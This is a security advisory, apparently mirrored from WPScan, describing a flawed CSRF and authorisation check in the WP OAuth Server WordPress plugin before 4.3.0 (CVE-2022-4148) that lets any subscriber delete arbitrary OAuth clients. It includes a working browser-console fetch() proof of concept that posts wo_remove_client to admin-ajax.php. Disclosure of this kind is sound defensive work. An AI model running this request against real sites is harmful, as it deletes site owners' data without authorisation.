Lucene search
Lana CodesWPVDB-ID:BE9B25C8-B0D7-4C22-81FF-E41650A4ED41HistoryFeb 21, 2023 - 12:00 a.m.
WP OAuth Server < 4.3.0 - Subscriber+ Arbitrary Client Deletion
2023-02-2100:00:00
Lana Codes
wpscan.com
7
wp oauth server
arbitrary client deletion
flawed csrf
authorisation check
authenticated user
0.001 Low
EPSS
Percentile
20.0%
The plugin has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.
PoC
Run the below command in the developer console of the web browser while being on the blog as any authenticated users, such as subscriber, this will delete the client with ID 123 fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=wo_remove_client&client;_id=123’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));
| CPE | Name | Operator | Version |
|---|---|---|---|
| oauth2-provider | lt | 4.3.0 |
Related
cvelist
cvelist
prion
prion
Cross site request forgery (csrf)
2023-03-20 16:15:00
nvd
nvd
CVE-2022-4148
2023-03-20 16:15:11
wpexploit
wpexploit
WP OAuth Server < 4.3.0 - Subscriber+ Arbitrary Client Deletion
2023-02-21 00:00:00
cve
cve
CVE-2022-4148
2023-03-20 16:15:11